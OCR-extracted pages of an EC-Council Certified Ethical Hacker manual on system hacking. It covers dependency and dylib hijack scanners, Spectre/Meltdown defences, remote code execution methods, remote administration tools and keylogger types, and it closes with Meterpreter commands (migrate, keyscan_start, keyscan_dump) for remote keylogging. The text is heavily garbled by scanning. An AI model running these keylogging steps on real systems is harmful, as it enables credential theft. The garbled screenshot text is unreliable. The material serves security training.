Ee GF SNOOPYEXE SO KERNEL2,DLL @ APL-MS-WIN-CORE-RTLSUPPORT-L1-1-0DLL @ APL-MS-WIN-CORE-RTLSUPPORT-L1-2-0DLL O NTL ee GO KERNELBASE.OLL @ APL-Ms-WIN-CORE-PROCESSTHREADSPI-MS-WIN-CORE-PROCESSTHREADS\PI-MS-WIN-CORE-PROCESSTHREADS P|-MS-WIN-CORE-PROCESSTHREADSI-MS-WIN-CORE-REGISTRY-L1-1-0DLL

Ordinal §

|

=

[omna

Fundtion | Entry Point

Function | Entry Point

PI-MS-WIN-CORE-MEMORY-L PI-MS-WIN-CORE-MEMORY-L1-1-2.DLL IN-CORF-HANDIF-I1-1-0.011

Module ‘ABI-MS- WN-CORE-APIOUERY-LT-1-0DLL ‘ADI-MS-WIN-CORE-APPCOMPAT-L1-1-0.DLL ‘ADI-MS-WiIN-CORE-APPCOMPAT-L1-1-1.DLL ‘ADI-MS-WIN-CORE-COMMLLT-1-0LL ‘ADI-MS-WIN-CORE-CONSOLE-L1-1-0DDLL ‘ABI-MS-WIN-CORE-CONSOLE-L1-2-0DDLL AWIN-CORE-CONSOL -WIN-CORE-CONSOL -WIN-CORE-CONSOL \WIN-CORE-CONSOLE-L3-2-01 ‘ABL-MS-WIN-CORE-CRT-LI‘ADI-MS-WIN-CORE-CRT-L2‘ADI-MS-WIN-CORE-DATETIME-Li-1-ODLL @ | apv-ms-win-CORE-DATEMME-L1-1-1.0LL

[ite

Time Stamp [Link Time Stamp Error opening file The system cannot find Error opening file. The system cannot find Error opening file. The system cannot find Error opening file. The system cannot find Error opening file. The system cannot find pening file, The system cannot find paring file. The oyster cannct find opening file. The system cannot find opening file. The system cannot find Error opening file. The system cannot find Error opening file. The system cannot find Error opening file. The system cannot find Error opening file. The system cannot find Error opening file The system cannot find

FileSize [ At. the le pected the fil specified the fil pected the file pected the fil pected the file specified te ile specified the ile specified the ile specified the file specified the file specified the fil specified the fil pected the file pected

@). 2). 2). 2). 2). 2. (2) (2) (2) 2). @). @). 2). 2).

Link Checksum —[ Real Checksum

[Error: Atleast one required implicit or forwarded dependency was not found. |Warning: At least one delay-load dependency module was not found. For Help, press FI Figure 6.129: Screenshot of Dependency Walker

Module06 Page 765

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking =

Exam 312-50 Certified Ethical Hacker

Dylib Hijack Scanner

Source: https://objective-see.com Dylib Hijack Scanner (DHS) is a simple utility that will scan your computer applications that are either susceptible to dylib hijacking or have been hijacked.

for

As shown in the screenshot, security professionals use DHS to detect applications that have been hijacked or are vulnerable to dylib hijacking. This information helps them to patch and fix these applications.

Hijacked

Applications

/Applications/1Password 7.app/Contents/Plugins/1PasswordSafariAppExtension.a

Vulnerable

stents /MacOS/1PasswordSafariAppExtension

Applications

/Applications/Xcode.app/Contents/Developer/usr/bin/Udb /AppLications/Xcode. app/Contents/SharedF ®

raneworks /DVTSourceControl. framework/Ve

/Library/Application Support/Adobe/Adobe Desktop Conmon/ADS/Adobe Desktop Service.

Figure 6.130: Screenshot of Dylib Hijack Scanner

Module 06 Page 766

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Defending

Exam 312-50 Certified Ethical Hacker

against Spectre and Meltdown Vulnerabilities

CE H

Regularly patch and update operating systems and firmware Enable continuous monitoring of critical applications and services running on the system and network Regularly patch vulnerable software such as browsers Install and update ad-blockers and anti-malware software to block injection of malware through compromised websites Enable traditional protection measures such as endpoint security tools to prevent unauthorized system access Block services and applications that allow unprivileged usersto execute code Never install unauthorized software or access untrusted websites from systems storing sensitive information Use Data Loss Prevention (DLP) solutions to prevent leakage of critical information from runtime memory Frequently check with the manufacturerfor BIOS updates and follow the instructions provided by the manufacturer to install the updates Defending against Spectre and Meltdown Vulnerabilities Various countermeasures to defend privilege Meltdown vulnerabilities are as follows:

escalation

attacks

that

exploit

Spectre

and

Regularly patch and update OSs and firmware Enable continuous monitoring of critical applications and services running on the system and network Regularly patch vulnerable software such as browsers Install and update ad-blockers and anti-malware software to block injection of malware through compromised websites Enable traditional protection unauthorized system access

measures

such

as endpoint

security

tools to prevent

Block services and applications that allow unprivileged users to execute code Never install unauthorized software or access untrusted websites from systems storing sensitive information Use data loss prevention (DLP) solutions to prevent leakage of critical information from runtime memory

Frequently check with the manufacturer for BIOS updates and follow the instructions provided by the manufacturer to install the updates

Module 06 Page 767

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Tools for Detecting Spectre and Meltdown Vulnerabilities InSpectre

Spectre & Meltdown Checker

@ InSpectre examines and discloses any Windows system's hardware and software vulnerabilityto

@ Spectre & Meltdown Checker is a shell script to tell if your system is vulnerable againstthe several "speculative

Meltdown and Spectre attacks

=, InSpectre: Check Spectre and Meltdown Protection

InSpectre | Release#8

-

CE H

execution" CVEs

x

Check Windows operating system ciiprocossornardvere sel, Freeware by Steve Gibson / @Sqgrc

Spectre & Meltdown Vulnerability Status ‘System is Meltdown protected: YES System is Spectre protected: YES Microcode Update Available: NO! Performance: SLOWER CPUID: 50657

See GRC's InSpectre webpage at: htipsi/grc.comyinspectre htm for a full explanation ofthe use and operation of this freeware utility. Disable Mekdown Protection

Disable Specte Protection

|

Est i "ites Jann re com

pright © by

Tipe] /eihub com Al Rights Reserved Reproduction i

Tools for Detecting Spectre and Meltdown Vulnerabilities Security professionals 00075 Detection and exist in the system security professionals exploitation.

Module 06 Page 768

can use tools such as InSpectre, Spectre & Meltdown Checker, INTEL-SAMitigation Tool, etc. to detect Spectre and Meltdown vulnerabilities that hardware. Detection of these vulnerabilities before exploitation helps to install the necessary OS and firmware patches to defend against such

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

System Hacking

=

InSpectre Source: https://www.grc.com InSpectre examines capability to prevent an early stage helps reloads the updated

and discloses any Windows system’s hardware and software Meltdown and Spectre attacks. Detecting these vulnerabilities at security professionals to update system hardware, its BIOS, which processor firmware, and its OS to use the new processor features.

(*. InSpectre: Check Spectre and Meltdown Protection

-

Check Windows operating system

InSpectre

and processor hardware safety.

Release #8

Freeware by Steve Gibson/ @Sggrc

x LI

|

Spectre & Meltdown Vulnerability Status System is Meltdown protected: YES

System is Spectre protected: YES Microcode Update Available: NO!

Performance: SLOWER

CPUID: 50657 (full details

below

See GRC's InSpectre webpage at https //are. com/inspectre. him for a full explanation of the use and operation of this freeware utility. Disable Meltdown Protection

Disable Spectre Protection

Exit

Figure 6.131: Screenshot of InSpectre showing Spectre and Meltdown vulnerabilities

=

Spectre & Meltdown Checker

Source: https://github.com Spectre & Meltdown Checker is a shell script to determine whether a system is vulnerable against various “speculative execution” CVEs. For Linux systems, the script will detect mitigations, including backported non-vanilla patches, regardless of the advertised kernel version number or the distribution (such as Debian, Ubuntu, CentOS, RHEL, Fedora, openSUSE, Arch, etc.). As shown in the screenshot, security professionals use Spectre & Meltdown Checker to determine whether the system is immune to speculative execution vulnerabilities. This tool helps them in verifying whether the system has the known correct mitigations in place.

Module 06 Page 769

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

iew Search Terminal_Help $sudo_./spectre-meltdown-checker.sh

Spectre and Meltdown mitigation detection tool vo.

checking for vulnerabilities on current system

* Hardware support (CPU microcode) for mitigation techniques * Indirect Branch Restricted Speculation (IBRS) * SPEC_CTRL MSR is available * CPU indicates IBRS capability:

(SPEC_CTRL feature bit)

* CPU indicates

(SPEC_CTRL

Indirect Branch Prediction Barrier (IBPB) IBPB capability:

feature bit)

Single Thread Indirect Branch Predictors (STIBP) * SPEC CTRL MSR is available * CPU indicates STIBP capabilit; Speculative Store Bypass Disable (SSBD) * CPU indicates SSBD capability

L1 data cache invalidation * CPU indicates

L1D flush

(Intel SSBD)

capability:

Microarchitectural Data Sampling * VERW instruction

is available:

6M)

(L1D flush

bit)

J

Indirect Branch Predictor Controls * Indirect Predictor Disable feature is available: * Bottomless RSB Disable feature is available * BHB-Focused

feature

IMM

Indirect Predictor Disable feature is available:

Enhanced IBRS (IBRS_ALL)

* CPU indicates ARCH CAPABILITIES

MSR availability:

[JN

Jl

Figure 6.132: Screenshot of Spectre & Meltdown Checker showing Spectre and Meltdown vulnerabilities ee

File Edit

Vie

* ARCH

arch Terminal CAPABILITIES

minal

He

MSR

advertises

IBRS

ALL

capability:

[gy

* CPU explicitly indicates not being affected by Meltdown/LITF (RDCL_NO): * CPU explicitly indicates not being affected by Variant 4 (SSB_NO * CPU/Hypervisor * Hypervisor

indicates

indicates

host

L1D flushing is not necessary on this system: CPU

might

be

affected

by

RSB

underflow

JIIGN Jy

(RSBA) :

* CPU explicitly indicates not being affected by Microarchitectural Data Sampling (MDS No): * CPU explicitly indicates not being affected by TSX Asynchronous Abort (TAA NO) * CPU explicitly indicates not being affected by iTLB Multihit (PSCHANGE MSC NO)

* CPU explicitly indicates having MSR for TSX control (TSX CTRL_MSR): * CPU supports Transactional Synchronization Extensions (TSX): J * CPU

supports

* CPU supports

Software

Special

Guard

Register

Extensions

Buffer

(SGX)

Data

Sampling

* CPU microcode is known to cause stability problems le Oxffffffff cpuid 0x50657) * CPU microcode

is the latest

known available

(SRBDS):

version:

CVE-2017-5753

Affected by CVE-2017-5715

(Spectre

Variant

1,

bounds

check

[GM

[I

(family @x6 model 0x55 stepping x7 ucod

1/88/13 according to builtin firmwares DB v222+i20226208) * CPU vulnerability to the speculative execution attack variants Affected

I

(latest version is 0x500320a

dated 202

bypass):

(Spectre Variant 2, branch target injection.

Affected by CVE-2017-5754 (Variant 3, Meltdown, rogue data cache load Affected by CVE-2018-3640 (Variant 3a, rogue system register read): Affected by CVE-2018-3639 (Variant 4, speculative store bypass) Affected Affected

CVE-2018-3615 CVE-2018-3620 CVE-2018-3646

(Foreshadow (SGX), L1 terminal fault) (Foreshadow-NG (0S), L1 terminal fault): (Foreshadow-NG (VMM), L1 terminal fault)

Affected by CVE-2018-12126 (Fallout, microarchitectural store buffer data sampling (MSBDS)): Affected

by CVE-2018-12130 (ZombieLoad, microarchitectural y CVE-2018-12127

(RIDL,

microarchitectural

load

fill buffer data sampling (MFBDS)): [ij port data

sampling

(MLPDS)):

[aaa

Figure 6.133: Screenshot of Spectre & Meltdown Checker showing Spectre and Meltdown vulnerabilities

Module 06 Page 770

‘al Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

CEH LO#03: Use Different Techniques to Hide Malicious Programs and Maintain Remote Access to the System

Maintaining Access After gaining access and escalating privileges on the target system, now attackers try to maintain their access for further exploitation of the target system or make the compromised system a launchpad from which to attack other systems in the network. Attackers remotely execute malicious applications such as keyloggers, spyware, and other malicious programs to maintain their access to the target system and steal critical information such as usernames and passwords. Attackers hide their malicious programs or files using rootkits, steganography, NTFS data streams, etc. to maintain their access to the target system.

Module 06 Page 771

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Executing Applications

CE H

(@

When attackers execute malicious applications it is called “owning” the system

@

The attacker executes malicious programs remotely in the victim’s machine to gather the information that leads to exploitation or loss of privacy, gain unauthorized access to system resources, crack the password, capture the screenshots, install backdoor to maintain easy access, etc.

Malicious Programs that Attackers Execute on Target Systems

Keyloggers

Backdoors

Crackers

ry)

Executing Applications Once attackers gain higher privileges in the target system by trying attempts, they may attempt to execute a malicious application by execute arbitrary code. By executing malicious applications, the information, gain unauthorized access to system resources, screenshots, install a backdoor for maintaining easy access, etc.

various privilege escalation exploiting a vulnerability to attacker can steal personal crack passwords, capture

Attackers execute malicious applications at this stage in a process called “owning” the system. Once they acquire administrative privileges, they will execute applications. Attackers may even try to do so remotely on the victim’s machine to gather the same information as above. The malicious programs attackers execute on target systems can be: =

Backdoors: Program designed to deny or disrupt the operation, gather information that leads to exploitation or loss of privacy, or gain unauthorized access to system resources.

=

Crackers: Components passwords.

=

Keyloggers: These can be hardware or software. In either case, the objective is to record each keystroke made on the computer keyboard.

=

Spyware: Spy software may capture screenshots and send them to a specified location defined by the hacker. For this purpose, attackers have to maintain access to victims’ computers. After deriving all the requisite information from the victim’s computer, the attacker installs several backdoors to maintain easy access to it in the future.

Module 06 Page 772

of software

or

programs

designed

for

cracking

a

code

or

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Remote Code Execution Techniques Exploitation for

| H

@ Unsecure coding practicesin software can make it vulnerableto various attacks

Client Execution

(@ Attackers can take advantage of the vulnerabilities in software through focused and targeted exploitations with an objective of arbitrary code execution to maintain access to the target remote system

Service Execution

@ System services are programs that run and operate at the backend of an operating system @ Attackers run binary files or commands that can communicate with the Windows system services such as

‘Windows Management

|@ WMIisa feature in Windows administration that provides a platform for accessing Windows system resources | locally and remotely

Service Control Manager to maintain access to the remote system

Instrumentation

|@ Attackers can exploit WMI features to interact with the remote target system and use it to perform information

Windows Remote

|@ WinRM is a Windows-based protocol designed to allowa user to run an executable file, modify system services, and the registry on a remote system

(WinRM)

(@ Attackers can use the wiinrmcommandto interact with WinRM and execute a payload on the remote system as

(wM1

Management

gathering on system resources and further execute code for maintaining access to the target system

a part of the lateral movement

Remote Code Execution Techniques Remote code execution techniques are various tactics that can be used by attackers to execute malicious code on a remote system. These techniques are often performed after compromising a system initially and further expanding access to remote systems present on the target network.

Some examples of remote code execution techniques are as follows: =

Exploitation for Client Execution

Insecure coding practices in software can make it vulnerable to various attacks. Attackers can exploit these underlying vulnerabilities in software through focused and targeted exploitations with an objective of arbitrary code execution to maintain access

to the target remote system.

Different types of exploitations for client execution are as follows: o

Web-Browser-Based Exploitation

Attackers target web browsers through spear phishing links and drive-by compromise. The remote systems can be compromised through normal web browsing or through several users who are targeted victims of spear phishing links to attacker-controlled sites used to exploit the web browser. This type of exploitation does not need user intervention for execution. o

Office-Applications-Based Exploitation Attackers target common office applications such as Microsoft Office through different variants of spear phishing. Emails containing links to malicious files are

Module 06 Page 773

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

directly sent to the end-users for downloading. To run the exploit, end-users are required to open a malicious document or file. o.

Third-Party Applications-Based Exploitation Attackers can also exploit commonly used third-party applications deployed as part of the software. Applications such as Adobe Reader, Flash, etc. are usually targeted

by attackers to gain access to remote systems.

=

Service Execution System services are programs that run and operate at the backend of an run binary files or commands that can communicate with Windows system as Service Control Manager. This code execution technique is performed new service or by modifying an existing service at the time of privilege maintaining access.

=

OS. Attackers services such by creating a escalation or

Windows Management Instrumentation (WMI) WMI is a feature in Windows administration that manages data and operations on Windows and provides a platform for accessing Windows system resources locally and remotely. Attackers can use the WMI feature to interact with the target system remotely, gather information on system resources, and further execute code for maintaining access to the target system. Attackers abuse WMI to perform lateral movements from the compromised system. Attackers leverage this feature to elevate privileges and obtain access rights on other networked systems. WMI helps attackers gain both local and remote access through WMI remote services such as the Distributed Component Object Model (DCOM) via port 135 and Windows Remote Management (WinRM) via HTTP port 5985 and HTTPS port 5986. Using WMI, attackers can also communicate with remote systems and run malicious files to maintain persistence and move laterally.

=

Windows Remote Management (WinRM) WinRM is a Windows-based protocol designed to allow a user to run an executable file to modify system services and the registry on a remote system. Attackers can use the winrm command to interact with WinRM and execute a payload on the remote system as a part of lateral movement.

Module 06 Page 774

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Tools for Executing Applications

CE H

] ] |i Dameware | Dameware Remote Support is a remote

| ] |

Remote

Support

Ninja con Nini

control and systems management tool that

| simplifies remote Windows administration

onhin BS

=

GRR2

598

ff

;

|

:

e

PDQ Deploy tif pcm ManageEngine Desktop Central -ntps://unow monogeengine.com PsExec ‘etps://docs.mirosof.com

Tools for Executing Applications Tools used for executing applications remotely help attackers perform various malicious activities on the target systems. After gaining administrative privileges, attackers use these tools to install, execute, delete, and/or modify the restricted resources on the victim machine.

Module 06 Page 775

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures ‘System Hacking =

Exam 312-50 Certified Ethical Hacker

Dameware Remote Support

Source: https://www.dameware.com Dameware Remote Support is a remote control and systems management tool that simplifies remote Windows administration, provides built-in remote admin tools, and remotely manages Active Directory (AD) environment. Disconnected - DameWare Mini Remote Control

File Edt View

{SESE E £98 Bp SAM Computers # £3 PNRP Peers £3 MAC Peers Saved Howt Lit

]D]_

i Global Hoot List

Sy Pena Host Lit o Eig Remote Host Lit

Poy

* Use Intel AMT KVM Connects to a remote intel AMT KVM host using the Remote

Use Frame Buffer (RFB) protocol Use ths option to connect to remete Qs! systems running on Intel vPro hardware. Ose Vn

Help users outs of your network by comectng to them over the Internet from Mei Renote Conta. Features ony avaiable for users nth Daneiare Remote Support hence. hea more

&Q,

Credentials Secumtyber [Remem

a

iy Internet Session

2 i Active Dretay Cenpues 2 Merook Weds Netw

Type: [Intel AMT Digest auherticaion Use Curent Logon Credentis User: Pacsmoed|

AU

New features

[iawe

Host Name /IP Adéese

&

2)

Global Host List

Access a common set ofhostsin Danellare Remote Support or Mev Remote Cantal when You carnect to Danelare Server. sieommere

Personal Host List Greate you onn host ist that you can ‘access fom any Danevare Remote Support or Mii Remote Contra when Server. you connect to Daneiiare hewn mre D0 not show again

zener

© Use nlaKM Connect via Pray Host

For Help, pressFI Figure 6.134: Screenshot of Dameware Remote Support

Some of the privilege escalation tools are listed as follows:

=

Ninja (https://github.com)

=

Pupy (https://github.com)

=

PDQ Deploy (https://vww.pdq.com)

=

ManageEngine Desktop Central (https://www.manageengine.com)

=

PsExec (https://docs.microsoft.com)

Module 06 Page 776

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

C | EH

Keylogger

© Keystroke loggers are programs or hardware devices that monitor each keystroke as the user types on a keyboard, logs ontoa file, or transmits them to a remote

location

@ Keyloggers allows the attackerto gather confidential information about the victim such as email ID, passwords, banking details, chat room activity, IRC, and instant messages

© Physical keyloggers are placed between the keyboard hardware and the operating system

sendittoa

&

o-

Keyboard Injection

atefe

ini

Cos

~

a

AE Poiiiation 4p Aviation Be

peteeeeetees

«omnes

«

Kernel injection

Keyoadsys

Ung(character) (Gar yeckeyntae == ~32767)

Sends malicious file

t

» file, the keylogger gets installed

Driver

mousesys | why

~~! Othe diver

Windows Kernel HAL

User

Keylogger Keyloggers are software programs or hardware devices that record the keys struck on the computer keyboard (also called keystroke logging) of an individual computer user or a network of computers. You can view all the keystrokes of the victim’s computer at any time in your system by installing this hardware device or program. It records almost all the keystrokes on a keyboard of a user and saves the recorded information in a text file. As keyloggers hide their processes and interface, the target is unaware of the keylogging. Offices and industries use keyloggers to monitor employees’ computer activities, and they can also be used in home environments for parents to monitor children’s Internet activities. Keyboard Injection Saveit to ‘a log fil tog file

C1.

Keylogger Injection emoggerin

BE *vietion Bp rovication ge

Driver Injection

«

Kemel injection

a

Driver Keyboard.sys

Using i£ (Get Asynckeystate

(character) == -32767)

Other drivers

Windows Kernel HAL

Keyboard

User

_usb.sys.

t »

file, the keylogger gets installed

mouse.sys

Figure 6.135: Demonstration of a keylogger

A keylogger, when associated with spyware, helps to transmit a user’s information to an unknown third party. Attackers use it illegally for malicious purposes, such as stealing sensitive and

confidential

information

about

victims.

This

sensitive

information

includes

email

IDs,

passwords, banking details, chat room activity, Internet relay chat (IRC), instant messages, and bank and credit card numbers. The data transmitted over the encrypted Internet connection Module 06 Page 777

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking are also vulnerable encryption.

to

Exam 312-50 Certified Ethical Hacker keylogging

because

the

keylogger

tracks

the

keystrokes

before

The keylogger program is installed onto the user’s system invisibly through email attachments or “drive-by” downloads when users visit certain websites. Physical keystroke loggers “sit” between keyboard hardware and the OS, so that they can remain undetected and record every keystroke. A keylogger can: Record every keystroke typed on the user’s keyboard Capture screenshots at regular intervals, showing user activity such as typed characters or clicked mouse buttons Track the activities of users by logging Window titles, names of launched applications, and other information Monitor the online activity of users by recording addresses of the websites visited and with keywords entered Record all login names, bank and credit card numbers, and passwords, including hidden passwords or data displayed in asterisks or blank spaces Record online chat conversations. Make unauthorized copies of both outgoing and incoming email messages

Module 06 Page 778

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

Types of Keystroke Loggers g

CE H Keystroke Loggers

I

l

Hardware

Software

Keystroke Loggers

Keystroke Loggers

H

|

| PC/BIOS Embedded

PS/2 and USB Keylogger

Application Keylogger

| Keylogger Keyboard

‘Acoustic/CAM Keylogger

Kernel Keylogger

External Keylogger

Bluetooth Keylogger

ypervisorbased Keylogger Form Grabbing Based Keylogger Javascript Based Keylogger

Wi-Fi Keylogger

Memory Injection Based Keylogger

Types of Keystroke Loggers A keylogger is a hardware or software program that secretly records each keystroke on the user eyboard at any time. Keyloggers save captured keystrokes to a file for reading later, or transmit them to a place where the attacker can access it. As these programs record all the eystrokes that are provided through a keyboard, they can capture passwords, credit card numbers, email addresses, names, postal addresses, and phone numbers. Keyloggers can capture information before it is encrypted. This gives the attacker access to passphrases and other “well-hidden” information.

Keystroke Loggers

Hardware

Software

Keystroke Loggers

Keystroke Loggers Application Keylogger

PC/BIOS Embedded

Keylogger Keyboard

Kernel Keylogger

External Keylogger

Wypendsor based Keylogger Form Grabbing

Ps/2 and USB

Keylogger

Acoustic/CAM

Keylogger

Bluetooth

Keylogger

Wi-Fi

keylogger

Based Keylogger Javascript Based Keylogger Memory Injection Based Keylogger

Figure 6.136: Types of keyloggers

Module 06 Page 779

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

System Hacking

There are two types of keystroke loggers: hardware key loggers and software key loggers. Both types help attackers to record all keystrokes entered on the target system. Hardware Keystroke Loggers

Hardware keyloggers are hardware devices that look like normal USB drives. Attackers can connect these keyloggers between a keyboard plug and a USB socket. All the keystrokes by the user are stored in the hardware unit. Attackers retrieve this hardware unit to access the keystrokes that are stored in it. Their disadvantage is the easy discovery of their physical presence. There are three main types of hardware keystroke loggers: o

PC/BIOS Embedded BlOS-level firmware that is responsible for managing keyboard actions can be modified in such a way that it captures the keystrokes that are typed. It requires physical and/or admin-level access to the target computer.

Keylogger Keyboard If the hardware circuit is attached to the keyboard cable connector, it can capture the keystrokes. It records all the keyboard strokes to its own internal memory that can be accessed later. The main advantage of a hardware keylogger over a software keylogger is that it is not OS dependent and, hence, will not interfere with any applications running on the target computer, and it is impossible to discover hardware keyloggers by using any anti-keylogger software. External Keylogger External keyloggers are attached between a standard PC keyboard and a computer. They record each keystroke. External keyloggers do not need any software and work with any PC. You can attach one to your target computer and monitor the recorded information on your PC to look through the keystrokes. There are four types of external keyloggers: e

PS/2 and USB Keylogger: and requires no software typed by the user on the chat records, applications

e

Acoustic/CAM Keylogger: Acoustic keyloggers work on the principle of converting electromagnetic sound waves into data. They employ either a capturing receiver capable of converting the electromagnetic sounds into the keystroke data, or a CAM (camera) capable of recording screenshots of the keyboard.

e

Bluetooth Keylogger: This requires physical access to the target computer only once, at the time of installation. After installation on the target PC, it stores all the keystrokes and you can retrieve the keystroke information in real-time by connecting via a Bluetooth device.

Module 06 Page 780

This is completely transparent to computer operation or drivers for functionality. It records all the keystrokes computer keyboard, and stores data such as emails, used, IMs, etc.

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

System Hacking

e

Wi-Fi Keylogger: Besides standard PS/2 and USB keylogger functionality, this features remote access over the Internet. This wireless keylogger will connect to a local Wi-Fi access point and send emails containing the recorded keystroke data. You can also connect to the keylogger at any time over TCP/IP and view the captured log.

Software Keystroke Loggers These loggers are the software installed remotely via a network or email attachment in a target system for recording all the keystrokes. Here, the logged information is stored as a log file on a computer hard drive. The logger sends keystroke logs to the attacker using email protocols. Software loggers can often obtain additional data as well, because they do not have the limitation of physical memory allocation, as do hardware keystroke loggers. There are four types of software keystroke loggers: o

Application Keylogger An application keylogger allows you to emails, chats, and other applications, trace records of Internet activity. This everything happening within the entire

observe everything the user types in his/her including passwords. It is even possible to is an invisible keylogger to track and record network.

Kernel/Rootkit/Device Driver Keylogger Attackers rarely use kernel keyloggers because they are difficult to write and require a high level of proficiency from the keylogger developers. These keyloggers exist at the kernel level. Consequently, they are difficult to detect, especially for user-mode applications. This kind of keylogger acts as a keyboard device driver and thus gains access to all information typed on the keyboard. The rootkit-based keylogger is a forged Windows device driver that records all keystrokes. This keylogger hides from the system and is undetectable, even with standard or dedicated tools. This kind of keylogger usually acts as a device driver. The device driver keylogger replaces the existing 1/O driver with the embedded keylogging functionality. This keylogger saves all the keystrokes performed on the computer into a hidden logon file, and then sends the file to the destination through the Internet. Hypervisor-Based Keylogger A hypervisor-based keylogger works within a malware hypervisor operating on the

Os.

Form-Grabbing-Based Keylogger A form-grabbing-based keylogger records web form data and then submits it over the Internet, after bypassing HTTPS encryption. Form-grabbing-based keyloggers log web form inputs by recording web browsing on the “submit event” function.

Module 06 Page 781

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking o

Exam 312-50 Certified Ethical Hacker

JavaScript-Based Keylogger Attackers inject malicious JavaScript tags on the web page of a compromised website to listen to key events such as onKeyUp() and onKeyDown(). Attackers use various techniques such as man-in-the-browser/manipulator-in-the-browser, crosssite scripting, etc. to inject malicious script.

o

Memory-Injection-Based Keylogger Memory-injection-based keyloggers modify the memory tables associated with the web browser and system functions to log keystrokes. Attackers also use this technique to bypass UAC in Windows systems.

Module 06 Page 782

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures System Hacking

Exam 312-50 Certified Ethical Hacker

CEH

Remote Keylogger Attack Using Metasploit |@ Attackers use tools such as Metasploit to launch persistent keylogging

@ Use the Keyscan_start command to initiate the actual keylogging process on the target system

|@ Attackers can also automate the entire sniffing and data dumping process using the Metasploit lockout_keylogger

exploit

Use the Keyscan_dump command to sniff the keystrokes of the user on the target machine

Copyright © by

Remote Keylogger Attack Using Metasploit Attackers may obtain remote access to the victim machine, but they cannot access specific folders or files that are secured with strong passwords. To steal such complex passwords from the target machine, attackers need to install and run a keylogger to capture the keyboard entries. For this purpose, attackers use tools such as Metasploit to launch persistent keylogging.

Establishing a Keylogger Using Metasploit On the exploited Windows machine, attackers establish following steps. =

a Meterpreter session and perform the

Use the ps command to obtain the list of running processes and their process IDs (PIDs) on the target system.

Module 06 Page 783

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures System Hacking =

Exam 312-50 Certified Ethical Hacker

To avoid closing and reinitiating the ongoing exploitation process, their current PID to that of a running process (here, explorer.exe).

attackers

migrate

getpid migrate

msedge.exe

ewy\Shel LExperienceHost.ex e

Windows11\Admin

conhost.exe

4

jusched.exe

C:\Program

svchost.exe

(x86)\Mic

rosoft\Edge\Application\ms

edge.exe

Windows11\Admin

8

Files

C:\Windows\System32\conhos

t.exe

Windows11\Admin

C:\Program

Files

(x86)\Com

NT

C:\Windows\System32\svchos

mon Files\Java\Java Update \jusched.exe

AUTHORITY\SYSTEM

t.exe

msedge.exe

xi

Windows11\Admin

C:\Program

Files

(x86)\Mic

msedge.exe

x

Windows11\Admin

C:\Program

Files

(x86)\Mic

svchost.exe

msed

6

4

NT

rosoft\Edge\AppLication\m edge.exe

rosoft\Edge\Application\ms

AUTHORITY\LOCAL

SERVICE

Windows11\Admin NT

edge.exe

C:\Windows\System32\svchos

t.exe

C:\Program

Files

(x86)\Mic

rosoft\Edge\Application\ms

AUTHORITY\LOCAL

SERVICE

edge.exe

C:\Windows\System32\svchos

t.exe

Imcterpreter >[migrate 8664 Migrating from 6580 to 8664 Migration completed successfully. Figure 6.137: Screenshot of Metasploit showing the migration of PID = =

Use

the Keyscan_start

target system.

command

to initiate the actual

keylogging

process

on the

Now, use the Keyscan_dump command to sniff user keystrokes on the target machine. This command dumps all the sniffed keystrokes and displays them on the console. Use the keyscan_stop command to stop sniffing keystrokes.

m > keyscan start Starting the keystroke sniffer Dumping captured keystrokes

1
>> |

ols System

Type | Name.

Value

IAT IAT

[ff#20000b95834] \SystemRoot\system32\kdeom dll [text] f¥ IAT/EAT [te0000b96820) \SystemRoot\system32%kdcom.dl [tex] > Devices

IAT

